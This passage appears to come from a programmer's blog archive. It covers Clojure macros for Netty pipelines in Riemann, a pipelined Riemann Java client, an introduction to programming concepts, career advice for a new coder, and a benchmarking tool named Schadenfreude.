(reify ChannelPipelineFactory (getPipeline [this] (doto (org.jboss.netty.channel.Channels/pipeline) ~@forms))))))

And there's the pipelinefactory itself. We construct a new pipeline, and… insert new code–the forms we generated before.

Macros give us control of syntax, and allow us to solve problems at compilation time. You don't have access to the values behind the code, but you can manipulate the symbols of the code itself absent meaning. Syntax without semantics. At compile time, Clojure invokes our macro and generates this bulky code we had before…

(let [protobuf-decoder (ProtobufDecoder. (Proto$Msg/getDefaultInstance))] (reify ChannelPipelineFactory (getPipeline [this] (doto (Channels/pipeline) (.addLast "integer-header-decoder" (LengthFieldBasedFrameDecoder. Integer/MAX_VALUE 0 4 0 4)) (.addLast "protobuf-decoder" protobuf-decoder)))))

… from a much simpler expression:

(channel-pipeline-factory integer-header-decoder (LengthFieldBasedFrameDecoder. Integer/MAX_VALUE 0 4 0 4) ^:shared protobuf-decoder (ProtobufDecoder. (Proto$Msg/getDefaultInstance))

Notice what's missing. We don't need to think about the pipeline class, or the name of its method. We don't have to name and manipulate variables. .addLast disappeared entirely. The protobuf handler is reused, and the length decoder is created anew every time–but they're expressed exactly the same way. We've fundamentally altered the syntax of the language–its execution order–in a controlled way. This expression is symmetric, compact, reusable, and efficient.

We've reduced the problem to a simple, minimal expression–and made that into code.

Tradeoffs

I didn't start out with this macro. Originally, Riemann used plain functions to compose pipelines. As the pipelines evolved and split into related variants, the code did too. When it came time to debug performance problems, I had a difficult time understanding what the pipelines actually looked like—composing a pipeline involved three to four layers of indirect functions across three namespaces. In order to understand the problem—and develop a solution—I needed a clear way to express pipelines themselves.

(channel-pipeline-factory int32-frame-decoder (int32-frame-decoder) ^:shared int32-frame-encoder (int32-frame-encoder) ^:shared executor shared-execution-handler ^:shared protobuf-decoder (protobuf-decoder) ^:shared protobuf-encoder (protobuf-encoder) ^:shared msg-decoder (msg-decoder) ^:shared msg-encoder (msg-encoder) ^:shared handler (gen-tcp-handler core channel-group tcp-handler))

In this code, the relationships between handlers is easy to understand, and making changes is simple. However, this isn't the only way to express the problem. We could provide exactly the same semantics with a plain old function taking other functions. Note that #(foo bar) is Clojure shorthand for (fn [] (foo bar)).

(channel-pipeline-factory :unshared :int32-frame-decoder #(int32-frame-decoder) :shared :int32-frame-encoder (int32-frame-encoder) :shared :executor shared-execution-handler :shared :protobuf-decoder (protobuf-decoder) :shared :protobuf-encoder (protobuf-encoder) :shared :msg-decoder (msg-decoder) :shared :msg-encoder (msg-encoder) :shared :handler (gen-tcp-handler core channel-group tcp-handler))

In this code we've replaced bare symbols for handler names with :keywords, since symbols in normal code are resolved in the current scope. Symbols can't take metadata, so we've introduced a :shared keyword to indicate that a handler is sharable. Non-shared handlers, like int32-frame-decoder, are written as functions which are invoked every time we generate a new pipeline. And to parse the list into distinct handlers, we could either wrap each handler in a list or vector, or (as shown here), introduce a mandatory :unshared keyword such that every handler has three parts.

This is still a clean way to express a pipeline factory—and it has distinct tradeoffs. First, the macro runs at compile time. That means you can do an expensive operation once at compile time, and generate code which is quick to execute at runtime. The naive function version, by contrast, has to iterate over the handler forms every time it's invoked, identify whether it's shared or unshared, and may invoke additional functions to generate unshared handlers. If this code is performance-critical, the iteration and function invocation may not be in a form the JIT can efficiently optimize.

Macros can simplify expressing the same terms over and over again, and many library authors use them to provide domain-specific languages. For example, Riemann has a compact query syntax built on macros, which cuts out much of the boilerplate required in filtering events with functions. This expressiveness comes at a cost; macros can make it hard to reason about when code is evaluated, and break the substitution rule that a variable is equivalent to its value. This means that macros are typically more suitable for end users than for library code—and you should typically provide function equivalents to macro expressions where possible.

As a consequence of violating the substitution rule (and evaluation order in general), macros sacrifice runtime composition. Since macros operate on expressions, and not the runtime-evaluated value of those expressions, they're difficult to use whenever you want to bind a form to a variable, or pass a value at runtime. For instance, (map future ['(+ 1 2) (+ 3 4)]) will throw a CompilerException, informing you that the compiler can't take the value of a macro. This gives rise to macro contagion: anywhere you want to invoke a macro without literal code, the calling expression must also be a macro. The power afforded by the macro system comes with a real cost: we can no longer enjoy the freedom of dynamic evaluation.

In Riemann's particular case, the performance characteristics of the (channel-pipeline-factory) macro outweigh the reusability costs—but I don't recommend making this choice lightly. Wherever possible, use a function.

Further examples

In general, any control flow can be expressed by a function called with stateful first-class function. Javascript, for instance, uses explicit callback functions to express futures:

var a = 1; var f = future(function() { return a + 2; }); f.await(); // returns 3

And equivalently, in Clojure one might write:

(let [a 1 f (future (fn [] (+ a 2)))] ; Or alternatively, #(+ a 2) (deref f)) ; returns 3

But we can erase the need for an anonymous function entirely by using a macro—like the one built in to Clojure for futures:

(let [a 1 f (future (+ a 2))] (deref f)) ; returns 3

The Clojure standard library uses macros extensively for control flow. Short-circuiting (and) and (or) are macros, as are the more complex conditionals (cond) and (condp). Java's special syntax for synchronize { … } is written as the (locking) macro—and the concurrency expressions (dosync) for STM transactions, (future) for futures, (delay) for laziness, and (lazy-seq) for sequence construction are macros as well. You can write your own try/catch by using the macro system, as Slingshot does to great effect. In short, language features which would be a part of the compiler in other languages can be written and used by anyone.

Summary

Macros are a powerful tool to express complex ideas in very little code; and where used judiciously, help us reason about difficult problems in a clear way. But—just as language designers do—we must balance the expressiveness of new syntax with the complexity of its interactions. In general, I recommend you:

  • Write simple macros which are as easy to reason about as possible.
  • Use macros to express purely syntactic transformations, like control flow.
  • Choose a macro to simplify writing efficient, but awkward, code which the runtime cannot optimize for you.
  • In most other cases, prefer normal functions.

I've been putting more work into riemann-java-client recently, since it's definitely the bottleneck in performance testing Riemann itself. The existing RiemannTcpClient and RiemannRetryingTcpClient were threadsafe, but almost fully mutexed; using one essentially serialized all threads behind the client itself. For write-heavy workloads, I wanted to do better.

There are two logical optimizations I can make, in addition to choosing careful data structures, mucking with socket options, etc. The first is to bundle multiple events into a single Message, which the API supports. However, your code may not be structured in a way to efficiently bundle events, so where higher latencies are OK, the client can maintain a buffer of outbound events and flush it regularly.

The second optimization is to take advantage of request pipelining. Riemann's protocol is simple and synchronous: you send a Message over a TCP connection, and receive exactly one TCP message in response. The existing clients, however, forced you to wait n milliseconds for the message to cross the network, be processed by Riemann, and receive an acknowledgement. We can do better by pipelining requests: sending new requests before waiting for the previous responses, and matching up received messages with their corresponding requests later.

ThreadedClient does exactly that. All threads enqueue Messages into a lockfree queue, and receive Promise objects to be fulfilled when their response is available. The standard synchronous API is still available, and allows N threads to pipeline their requests together. Meanwhile, a writer thread sucks messages out of the write queue and sends them to Riemann, enqueuing written messages onto an in-flight queue. A reader thread pulls responses out of the socket and matches them to enqueued messages. Bounded queues provide backpressure, which limits the number of requests that can be in-flight at any time. This allows for reasonable bounds on event loss in the event of failure.

Here's what the naive client (wait for round-trip requests) looks like on loopback:

throughput-tcp.png

And here's the same test with a RiemannThreadedClient:

throughput-threaded.png

I've done no tuning or optimization to this algorithm, and error handling is rough at best. It should perform best across real-world networks where latency is nontrivial. Even on loopback, though, I'm seeing roughly double the throughput at the cost of roughly double per-event latency.

Computer languages, like human languages, come in many forms. This post aims to give an overview of the most common programming ideas. It's meant to be read as one is learning a particular programming language, to help understand your experience in a more general context. I'm writing for conceptual learners, who delight in the underlying structure and rules of a system.

Many of these concepts have varying (and conflicting) names. I've tried to include alternates wherever possible, so you can search this post when you run into an unfamiliar word.

Syntax

Every program has two readers: the computer, and the human. Your job is to communicate clearly to both. Programs are a bit like poetry in that regard–there can be rules about the rhythm of words, how punctuation works, do adjectives precede nouns, and so forth.

Every program is made up of expressions, organized in a tree. You can think of an expression like a sentence: it has some internal structure, and can contain other expressions as clauses.

English | Javascript | Clojure One plus one. | 1 + 1 | (+ 1 1) | | One plus one, | (1 + 1) / 3 | (/ (+ 1 1) 3) divided by three. | | | | Zoe kicks the ball. | zoe.kick(ball) | (kick zoe ball) | | The ball which Zoe kicks | deshawn.catch( | (catch deshawn is caught by DeShawn. | zoe.kick(ball)) | (kick zoe ball))

All of these expressions have the same syntax tree, but phrase it in different ways.

Every expression is equivalent to something. (+ 1 1) is equal to 2. We call 2 the value of the expression. The computer's job is to evaluate expressions, converting them gradually to values.

(/ (+ 2 4) 3) (/ 6 3) 2

Most languages evaluate the deepest expression first. We had to evaluate (+ 2 4) before we could divide it by three. Most languages also have a way to evaluate sequences of expressions in order, usually from top to bottom. We call these “statements”, but they're really just expressions where we don't care about the return value. If expressions are clauses, statements are sentences.

cat.pounce(mouse); 1 + (3.0 / 5)

cat.pounce(mouse) is an expression, so it has a value. We just didn't do anything with it; once evaluated, we forgot about its value and moved on to the next statement. Some languages have statement terminators. Like the period in a sentence, the semicolon in javascript ends a statement. Some languages, like Ruby, put each statement on a separate line, and the semicolon is optional. Other languages use commas, or indentation.

In Lisps, statements are just a special kind of expression:

(do (pounce cat mouse) (+ 1 (/ 3.0 5)))

Every language you learn will involve picking up a new syntax, which helps you build the syntax tree the computer uses to run your program.

Values and identity

Values are the things in the world. The desk I'm typing at right now, made of wood and steel, with particular scratches on it, that's a value. My desk is an identity. Maybe this desk today, and maybe tomorrow a different desk entirely. My body, with a particular pattern of cells and fluids frozen in time, is a value. Kyle is an identity, which points to a different body every second. Identities are the fixed names for changing values. The values themselves never change, but identities do.

We say that values are immutable, because they never change. We say that identities are mutable, and their changing values over time are called state. Many languages call identities variables and values constants.

// x is a variable, an identity, and its current value is 5. x = 5; // Now we print x to the screen. The number five appears. print(x); // We can change the value x points to. Now it's six. x = 6; // This time, we print the number six. print(x);

Different languages have different conventions about which things are immutable. Numbers, like 2, 1/5, and 3.1415 are always immutable. Java says strings, like "hi there" are immutable, but Ruby has mutable strings. You can change a string from one value to another. Collections like [1, 2, 3] are typically mutable, but some languages like Haskell, Erlang, and Clojure consider collections immutable too.

Why does mutability matter? Your program needs to talk about the real world, and in the real world things change. Identities help us understand change. At the same time, when things change, you can't rely on them any more. Someone might hide your keys, or switch out the meal you're enjoying. Immutability lets you guarantee that things won't change over time.

Functions

Functions are the verbs of programming. Given some arguments (also called parameters), they return a value. When you call a function, the computer evaluates the function's expressions, using the parameters you specify, to come up with a return value. In Clojure:

(defn fly [bird] (println "The " bird " is flying!"))

defn means “define function”. The function's name is fly, and it takes one argument, called bird. When called, we evaluate the println expression within. The argument bird will stand for a specific bird. In Javascript:

function fly(bird) { println("The" + bird + "is flying!"); }

There's a critical distinction between the function itself, and calling it. For example, think about the verb “fly”. It's the potentiality of flight, and we can talk about flying without actually doing it. But to really fly, we connect the verb with subjects and objects: “Fly, swan!”. fly, by itself, is a function. But calling fly with “swan” will evaluate the function's code, and return a new value.

(fly "swan")fly("swan");

Purity

Some functions, given the same values, always do the same thing. For instance,

function add(a, b) { return a + b; }

…will always return the same sum for any pair of numbers. We say that add is pure. We know that add(1,5) is always 6, and nothing can ever change that. That means that anywhere we see add(1,5), we don't even have to run the function. We know exactly what the consequences will be, so we can speed up the program by omitting needless work. This kind of optimization happens at various levels, from the physical chip to the language itself.

Impure functions, on the other hand, don't do the same thing every time. They might have side effects.

function add(a, b) { alert("I'm adding " a + " and " + b); return a + b; }

This function is not safe to optimize away, because it prints a message to the screen when invoked. We have to run it every time.

Where possible, programmers try to write pure functions. They're easy to test, because they always do the same thing. They're easy to reason about, because they won't interact in sneaky ways with the world when you're not looking. You can run functions in any order, or skip their evaluation when their output is never used. They're also safe to run in parallel.

Pure functions and immutable values work together, but the real world requires side effects and change. A big challenge in organizing code is controlling the use of impure functions and mutable identities, to balance performance and reasonable-ness.

Types

Types are the kinds of values in the world, the taxonomy of creatures. A given rabbit is a member of the family Leporidae, within the order Lagomorpha. By extension they are also mammals, vertebrates, and animals. The number 2 is an integer, and by extension a number. Every language has a type system, which is the taxonomy (called a “type hierarchy”) and the rules about how different types interact.

If you know the type of two objects, you can make assertions about how they work together. You can add any two numbers, so the integer 2 plus the decimal 0.5 is 2.5. But what is 2 plus an apple? Plus operates with numbers, so the expression doesn't make sense. We call this a type error.

Some languages have strict rules about the types of values and identities. You must declare the types you're working with in advance. In these statically typed languages, the computer can prove (to varying degrees) that the program is correct before it even runs.

Other languages have flexible rules about types. In a dynamically typed language, you don't have to know what kind of value you're working with until you actually evaluate an expression. Then the computer checks to see if your values can interact in that way.

Common types

You'll encounter the same types over and over again in different languages.

Integers are numbers like -1, 0, 1, 1242354, and so forth. Floats are numbers with decimal points, like 0.5, -1.999, etc. Most integers and floats only encompass a limited range of numbers before degrading in some way: 32-bit integers can only talk about numbers from -2147483648 to 2147483647. Floats have a limited number of decimal places, so they can't talk about big numbers with high precision. There are special types for large or very precise numbers. Some languages have rational types, like 2/3, which can express fractions perfectly.

Strings are lists of characters, like "hi there" or "音韻体系".

Keywords (in Ruby, symbols, in Erlang, atoms) are lightweight strings. Not every language has these. Sometimes they're written with a colon in front, like :cat. There's another sense of the word “keyword”, which refers to special words in the language like if and function. That's different.

Lists are ordered collections of things, like (6, 4, 2). Getting the first element is fast, as is going over each of the elements in order. However, getting elements towards the end of the list takes more time.

Arrays, also called vectors are ordered collections of things where you can get the element at any given position quickly. They're often written as [6, 4, 2].

Maps, like {"cat": "meow", "dog": "woof"}, are dictionaries. Given a key, like “cat”, you can look up a corresponding value, like “meow”, quickly. You'll also see them called hashmaps, maps, associative arrays, or objects.

Functions are values, and they have a type. In JS, a function which adds two numbers together could be written as function(a, b) { return a + b; }.

Identities are a type, too. In fact, every type in the system has a corresponding type of identity. There's a special type for “identities which point to floats”, and a type for “identities which point to lists”. Most languages let you pretend identities just are their values.

Organizing code

One of the hardest problems in writing large systems is managing complexity. You need to reduce the problem into manageable chunks–pieces you can reason about individually.

Functions (often called methods) are your first and most broadly useful. Every function should do one thing, and (like everything else) should have a short, meaningful name. If your function is longer than thirty lines or so, it's too big. Find the logical borders or distinct phases and break them up into their own functions.

Above functions, languages vary in how they organize code. A common pattern is to group functions into a namespace, or module, or package. Inside the namespace, you use short names to refer to the functions. Outside the namespace, you refer (or import or require) to functions and values from other namespaces as necessary. Think of namespaces like papers; each with citations to draw in ideas and proofs from other papers. Namespaces are usually hierarchical; they can be nested in other namespaces to break up large projects.

Object-oriented languages have the concept of classes of objects. An object is a map of keys to values, and some functions which operate that map. The class defines what types of data are stored in an object, and defines the functions (also called methods) on the object. Each individual object (called an instance) has different data, but the same functions.

Objects and classes are typically bound up with the type system in some way. You might have an instance of the Rabbit class, which defines methods like hop. Rabbit might be a subclass of Animal, which has functions allowing rabbits and other kinds of animals to eat. The problem of organizing classes is… the subject of much debate.

Libraries are distinct collections of code geared towards solving a particular problem, like “working with geography” or “parsing natural language”. A library usually keeps its code inside a distinct namespace, so you can use it in other projects. Every language comes with a standard library built in, which defines the basic datatypes and functions everybody needs. There's usually a package manager which helps you download other libraries from the internet and integrate them into your code.

Frameworks are giant libraries which provide a skeleton for your code to fill out. Rails is a framework for serving web pages, written in the Ruby language. Frameworks take care of organizing code and solving common problems for you, so you can focus on solving a particular problem. Like skeletons, frameworks shape your code in a particular way. You can't build an elephant around a human skeleton; it's just not the right shape to support that problem. When you choose a framework, it's important to find one that's designed for the problem you're trying to solve.

Symbols

So far we've spoken in concrete terms, but solving a real problem requires abstraction. It requires names for things. In a program, you build up complex ideas from smaller pieces, by using symbols (also called identifiers or variables) to name them.

I want to make clear that symbols are a different level of a language from values. Before, we talked about real things: actual swans, the concept of flight. Now I'm talking about the words themselves, on the paper: the word “swan”, the word “fly”. In a sense, symbols are the pronouns of a language. Behind a symbol is a value. The word “she” can mean “Amelia Earhart”, or “Grace Hopper”. We infer the specific meaning of the symbol “she” from context.

In code, we need to talk about many ideas at once, and so our range of pronouns is essentially infinite.

subtotal = 5.25 + 1.40; tax = subtotal * 0.07; total = subtotal + tax;

5.25 is a literal value. It's the number 5.25. subtotal is a symbol, a pronoun which refers to the value of 5.25 + 1.40. In the next line, we can use subtotal to stand for 5.25 + 1.40. tax and total are symbols too. Choosing simple, descriptive symbols helps us understand the meaning of the code.

In some languages like Clojure, Erlang, and Haskell, symbols refer directly to values. subtotal can't change, because it is immutable. In languages like Ruby, Javascript, and C, symbols refer to identities, which point to values. subtotal can change in those languages, because it's an identity. It's mutable.

A symbol without a value is unbound: it represents the abstract potential for some value to come along. A symbol which has taken on a specific value is called bound. Now it stands for something. This is how functions work!

function add(a, b) { return a + b; }

In this function, a and b are unbound symbols. They have no specific value, but that's OK, because the computer doesn't need to evaluate the function yet. When we call add(3, 5), we provide values for a and b. The computer evaluates a + b with a bound to 3 and b bound to 5.

Scope

In English, “he” is usually bound to the most recent male person in the text. If you start off a book with “he devoured the mouse whole”, we have no idea who did the devouring! The scope of a symbol is the region of text where that symbol is bound to a value.

Global scope means a symbol is bound everywhere. Depending on your Bible, capitalized “He” or “She” means God, no matter where in the text it appears. We might say that “He” is a global variable.

Most modern languages also use lexical scope, which means that a symbol is bound within an expression.

function add(a, b) { // a and b are bound in this function expression if (a > 2) { // And also in nested expressions return function() { // For instance, this new function return a + b; } } } // However, a and b are *not* bound here! a + b; // Wrong!

Lexical scope only applies to the code as written. Lexical symbols are not bound in other parts of the text. For instance:

function trouble() { // x isn't bound here return x + x; // Wrong! } function double(x) { // x is bound here return trouble(); } double(2);

Inside double, x is bound to 2. double calls trouble–but because trouble is defined outside the scope of x, x is no longer bound. This program doesn't work.

There is another kind of scope called dynamic scope, where this program does work. Dynamic scope means a symbol is bound anywhere in an expression–and also within any function calls that expression makes. Dynamic scope means you may not know where a variable comes from, which makes it harder to reason about. It's used with restraint.

If you learn an object-oriented language, you'll hear about instance variables and class variables. These symbols are available within a particular instance of a class, or shared across the whole class itself. If you think of an class definition as being a class expression, surrounding an instance expression, then class and instance variables are just lexically scoped. The language may not write it that way, though.

Wrapping up

This guide doesn't teach you how to program, but hopefully it explains why languages work the way they do. As you explore a specific language, keep an eye out for how the language writes and combines expressions. What are the basic types, and how do they work together? Look for functions, and how they're named and organized. How are the symbols named, and do they refer to identities or values? What are the rules around scope? And don't worry if this doesn't make sense just yet. As you copy existing code, make a few small changes, and gradually write your own programs from scratch, these concepts will solidify. :)

A good friend of mine from college has started teaching himself to code. He's hoping to find a job at a Bay Area startup, and asked for some help getting oriented. I started writing a response, and it got a little out of hand. Figure this might be of interest for somebody else on this path. :)

I want to give you a larger context around how this field works–there's a ton of good documentation on accomplishing specifics, but it's hard to know how it fits together, sometimes. Might be interesting for you to skim this before we meet tomorrow, so some of the concepts will be familiar.

How software is made

There are two big spheres of “technical” activity, generally referred to as “development” and “operations”. Development is about writing and refining software, and operations is about publishing and running it. In general, I think development is a little more about fluid intelligence and language, and ops is more about having broad experience and integrating disparate pieces.

In a broader sense, you'll also have product and design roles (and there's a lot of variance in how people fulfill these roles). “Product” is about understanding your problem, meeting with people who need it solved, understanding the tools at your disposal, and figuring out the shape of the solution without knowing the details. “Design” is about expressing that solution to a human being. Everything from the core ideas (what are the concepts involved and what do we call them?) to the visual and temporal layout of those ideas on the screen or in the product, to (at the most concrete) the specific colors, alignments, fonts, sounds, and images used.

Imagine a car race through the desert. The product team plans the route, finds the drivers, and decides what type of car to build. Developers design the engine, balance the vehicle, optimize chemistry, figure out the dimensions, and build the frame. Designers shape the skin and geometry, decide on colors, and position the controls so the driver has everything at hand. Operations is the ground team, who watches performance telemetry, puts out fires, and replaces broken parts or swaps out the tires for better performance on new terrain.

Designers and product folks communicate a lot about how to solve the problem in a way that makes sense to users. Developers and designers work closely together to shape the overall vehicle–designers conform the design to the user, and developers conform the design to the computer. Developers give feedback to product people about what's actually buildable, and the product team pushes developers to solve a real problem. Developers help operations understand how the car is put together internally–where the weak points are, what are the temperature limits, what kind of gas to use, how to swap out the intake manifold. Operations helps developers understand how the car is performing in the field. How did it crash, what parts need reinforcement, what's the limiting factor in speed, the oil filter is clogged with shavings, etc.

Building web sites is a great way to explore all these roles. You'll get to try a little bit of each, and get a feel for what really clicks with you.

Parts of a web site

The frontend is the part you see in a browser. It's an HTML document, which is a language for describing structured text, a CSS stylesheet, which controls positions, colors, and sizes, and Javascript code, which controls interactive components. These guys are called “frontend developers”, and usually work with (or are) a visual designer and UX designer.

The backend lives on a server. It's often broken up into several components, each solving a specific problem. One part renders the frontend and serves it to users who make requests. One part stores information in a database. One part might do work appropriate to the task, like making phone calls, computing trajectories, talking to a third-party service, etc. These folks are often called “backend engineers”.

The environment is the stuff around the backend. It's the physical computers, the operating system, storage services, the network, monitoring, emergency response, etc. A woman who maintains these services is usually called an “operations engineer”, “network administrator”, or “sysadmin” depending on specialty.

Sometimes these teams are very isolated, other times they work closely. Sometimes each person works narrowly in a single role, other times an individual will personally shepard a feature through all these roles. Depends on how the team is organized. Startups generally have smaller teams, more tight-knit groups, and more permeable roles.

The process of coding

Development is a lot like academia. Your job is to understand a problem, develop a way to talk about it, and write an argument. Just like leading a reader through a chain of reasoning, you'll lead a computer through solving the problem. The difference is mostly in specificity: computer languages are simpler, are executed faster, and aren't as forgiving of mistakes.

First I reason about a problem. I try to phrase it in a simple way to myself. Break it into subproblems which can be solved easily. Develop a notation to talk about it, draw diagrams, walk through simple cases step by step, and look up how other people solved it. Sometimes this takes seconds, other times days.

Then I write it in code. I break it up into functions, each of which expresses a simple, individual idea. I decide on common names for the things I'm trying to discuss, and use them consistently. Then I assemble the functions together into one that solves the problem. Each function or logical group has “comments”, which explain why the solution works this way and fills in contextual gaps for humans. Code always has two readers–the computer, and the person who comes in weeks or years later to change or improve it. Your job is to express the solution clearly and efficiently to both.

Third, I test the solution. I think of example cases–if I'm testing addition, I know that 1 + 1 is 2, and -3 + 5 is 2. Good software carries with it a test suite full of these demonstrations, which verify every piece of the program.

Finally, I refine. Maybe the program wasn't formatted correctly, or I mis-spelled a word. Maybe there was a logical error. The compiler (thing that turns the language into a running program) and your tests work together to demonstrate that the solution is correct. Maybe it's correct, but it's too slow. I figure out where the problems are and redesign or optimize as necessary. This tends to be the hardest part.

The bigger picture

Writing complex software is a process of continual change. You'll go through many drafts of an essay, discovering new sources or reorganizing, reviewing by yourself or with peers. In development, we call a draft a “version”. Version control is the software that saves all our versions and connects them in a giant web. It allows us to understand the historical evolution of a document, and more importantly, to integrate changes with others.

When many people work on software, we try to break the program up into small parts with well-defined borders. Then each person can work on a separate part and not interfere with each other, so long as the borders don't change. There are a lot of ways to organize code, but in general they all aim to compartmentalize complexity so you can understand and change small pieces individually.

Imagine writing a paper with a friend. You might each take section and write it individually, then combine them into a single document. Then you'll read each other's essay and expand on it, maybe changing the wording or reordering phrases. Every time you make a distinct change you might save a new version. When your friend and you compare notes that evening, you can consider each change in isolation, deciding whether it fits with your overall theme or not. Small changes are easier to combine together, and help you understand the history of the document. When you discover a critical paragraph went missing, you can search the history to find out where it disappeared and why.

Common tools

If you want to go for a career in tech I'd focus on building the most universally applicable skills first. It requires a bit of abstract, up-front investment, but they'll help you work faster in the long run and are skills you continually reinforce. Think of this part like an intro class in finding sources, structuring an essay, etc.

First: You'll need an operating system. Honestly, most of the tools you'll be using just aren't designed for Windows. It's possible to get along but it can be clunky. Linux is probably choice #1, and Mac OS a common second. Many windows-based devs I know run Ubuntu in a virtual machine.

http://www.psychocats.net/ubuntu/virtualbox

Second: you need an editor, something that lets you write text. Some folks start with Textmate, Sublime Text, or Notepad++, but the best programmers I know use Emacs or (my preference) Vim. They're both powerful, but will feel awkward while training muscle memory. You can always switch later, but folks tend to stick with their early choices. It's like driving stick vs auto. Some languages like Objective C or Java need a lot of contextual information–like foreign language dictionaries, proofreaders, etc, to write well. If you work in one of those languages, you'll probably adopt a specific kind of editor, called an IDE, designed to help you.

Third: version control. There are a lot of choices, but most people and projects I work with use Git and Github. You can pick up the basics in a half hour and it'll make your life super easy as you start working on a project.

Languages

OK here's where I bring in personal opinions. Everyone's got em, ask a different person and you'll get different answers, often strongly felt. You'll start to develop these as you explore. Whatever you're using right now is The Best Language.

Javascript is a… necessary evil, and not the worst thing in the world. It's the only way to write frontend interactive code, so if you want to build interactive web pages you'll need to use it. It was thrown together quickly as a language, so its design suffers as a result. There are many special cases. Organizing code is difficult. The “things” in the language like numbers, strings, and lists can change type unexpectedly. Understand that when you write Javascript you can feel frustrated or confused and not know why; part of the reason is because the language itself is limited. It's a pidgin.

There's another class of frontend design, and that's for phones and tablets. The two big players are IOS (e.g. the iphone and ipad), which uses a language called Objective-C, and Android, which uses a language called Java. They're roughly equivalent in complexity and language power, like French and German. I'd say they're both middling in expressiveness. They're more… finicky than writing backend code. More special cases, a little harder to get started. That said, there's nothing like the power of making a magic thing happen in the palm of your hand, and if abstract problems aren't as interesting this can be a great niche.

On the backend, your choices are a lot wider. Lots of folks are using Ruby or Python. Like French and Spanish, they're both common, closely related, and roughly equal in performance and power. Because they're widely adopted you'll find libraries (chunks of code you can put together to solve specific problems) for almost everything.

For performance, big shops like to use Java, and to a lesser extent, C or C++. Java is reasonably fast but quite large, as a language, and slow to improve. I find it… muddy to write in. It's like not being able to use commas, and having to break every thought into a distinct simple sentence. C and its variants are extremely fast but can be more dangerous. I'd advise these as second languages.

I would avoid PHP and Perl. They're OK languages but suffer from… agglomerated cruft, and there's no particular strength to recommend them. PHP lacks design restraint and ended up a bit like English: nobody can agree on what words to use.

Lisp (remember the language you learned last time we talked?) and its variants are a bit like Latin. Very old–one of the first, actually. Radically simple. Incredibly expressive. Very few speakers, although that's changing with Clojure. Almost every other language can be viewed as a subset of Lisp. It… changes you, the way you think, in fundamental ways. Makes you a better programmer in other languages.

When you start programming, your thoughts will be small and concrete, just like in any new language. As you grow, you'll start to solve bigger problems, more abstract problems. Every language has a sort of.. abstraction ceiling, above which you can't express ideas directly. For instance, English will let you define new names for objects you haven't encountered before. German will let you generate compound verbs, but in practical terms English and German are roughly equivalent in descriptive power; they just approach the problem differently. Most computer languages are like that. Lisp… lets you invent new grammar on the fly.

That said, there aren't many folks hiring in Clojure or other Lisps, though they are out there and the jobs are cool. I recommend playing with it, if you have the time.

Most modern languages are very similar. Ruby, Python, Perl, PHP, Java, and C are all Germanic, insofar as they share close conceptual ancestors. There are whole other families of languages out there which you should be aware of, analogous to Japanese or Arabic, though not many people are using them. In particular, Haskell and OCaml are strongly typed functional languages which look quite different from any other–and have a higher abstraction ceiling. Erlang is a functional distributed language where code can live across many computers at once. If you choose to pursue these sorts of languages it can be extremely rewarding (and make you an excellent programmer), but you may have to study for longer before finding a job.

A hypothetical first job

You'll start learning a language, and gain experience with the fundamental tools. Over time you'll build a project that drives you to learn specific libraries for a task, like drawing pictures, storing data, or serving web pages. As you gain confidence you'll start writing code that exemplifies your style and skill. All your projects are published on Github. Nobody notices.

When you feel ready, start putting out feelers. Your portfolio has a few small projects–maybe demos, maybe libraries–which show your ability to write clear, documented, testable, code. You start sending your resume around, and link to your github account. Folks read the code, and see potential.

You land a job at a small startup, and fumble your way through a million things nobody thought to tell you. You feel useless for a bit, but start to catch on. In a month (heck, maybe your first day) your first code hits production, and something you built is on the screen for ten thousand users. The problems at your job spur you to learn new libraries, algorithms, and languages. You write some code to help talk to a natural language parsing service, and your boss says sure, throw it up on github.

From there it sort of cascades. As your open-source profile grows in quality and reach, more people will start to take notice of your code. Maybe you get a promotion internally, or move to another company. You'll have the latitude to branch out a fair bit at a startup, and learn from your peers.

OK, get to the chase, Kyle!

Option A: Towards frontend development.

You and I write a tiny web site together, tomorrow. Something super basic, like a notepad. We can get you started with Ruby as a language, Sinatra for a server framework, and HTML+CSS to show the page. Should only take a hundred lines or so, and you'll have a skeleton to start exploring on your own. You'll get an overview of the “full stack” from frontend to backend, and version control. OTOH, you'll be learning three distinct languages at once, which can get confusing. Testing frontends is extremely challenging, so we won't discuss that aspect much. On the other hand, you can see the results in the browser, which can feel great.

Option B: Towards backend development.

We work through some Project Euler problems together. They're bite-size math problems and each has a single answer, so there are clear goals and you get the satisfaction of solving each in turn. They start easy and get harder, and introduce you to powerful techniques along the way. We can use any language, but I'd recommend Clojure or Ruby. This path would introduce you to testing, algorithms, debugging… the process of problem solving in code. You only have to learn one language, which can give you a leg up on tackling A later. It'll push you to deeply understand a given language and advanced techniques.

Option C: Build something you care about.

Take any problem you think is interesting. Make it personal. Doesn't matter if anyone else cares, you just need something that'll drive you to think about and solve it. Maybe you want to… translate Latin texts automatically, make a chat client, plot your weight, index papers, make a videogame… whatever. I'll help you design a solution in any language.

And of course you can switch between these whenever you get bored. All of these paths will broaden over time and introduce you to the language and techniques you'll need for a job.

–Kyle

Schadenfreude is a benchmarking tool I'm using to improve Riemann. Here's a profile generated by the new riemann-bench, comparing a few recent releases in their single-threaded TCP server throughput. These results are dominated by loopback read latency–maxing out at about 8-9 kiloevents/sec. I'll be using schadenfreude to improve client performance in high-volume and multicore scenarios.

throughput.png

I needed a tool to evaluate internal and network benchmarks of Riemann, to ask questions like

  • Is parser function A or B more efficient?
  • How many threads should I allocate to the worker threadpool?
  • How did commit 2556 impact the latency distribution?

In dealing with “realtime” systems it's often a lot more important to understand the latency distribution rather than a single throughput figure, and for GC reasons you often want to see a time dependence. Basho Bench does this well, but it's in Erlang which rules out microbenchmarking of Riemann functions (e.g. at the repl). So I've hacked together this little thing I'm calling Schadenfreude (from German; “happiness at the misfortune of others”). Sums up how I feel about benchmarks in general.

